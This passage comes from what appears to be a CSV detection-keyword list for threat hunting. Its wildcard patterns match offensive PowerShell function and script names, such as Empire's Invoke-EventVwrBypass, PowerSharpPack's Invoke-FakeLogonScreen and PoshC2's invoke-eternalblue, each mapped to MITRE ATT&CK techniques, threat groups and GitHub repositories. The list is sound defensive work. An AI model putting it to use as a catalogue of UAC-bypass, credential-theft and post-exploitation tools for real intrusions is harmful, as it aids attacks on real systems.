","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Empire *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*Invoke-Empire*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EndpointProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-EnumerateAzureBlobs.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-EnumerateAzureSubDomains.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-EnumerateLocalAdmin -Verbose*","greyware_tool_keyword","powershell","Find local admins on the domain machines","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*invokeenumeratelocaladmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-EnvBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EnvBypass.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-EnvBypass.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EssessAgress*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*invoke-eternalblue*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-EventHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*invoke-eventhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*Invoke-EventViewer *.exe*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*Invoke-EventViewer.ps1*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*Invoke-EventVwrBypass*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EventVwrBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExecuteMSBuild*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExecuteMSBuild.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExecuteMSBuild.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ExploitableLeakedHandlesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Eyewitness*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-FakeLogonScreen*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Farmer*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invokefilefinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-FileFinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-FileFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-FodHelperBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 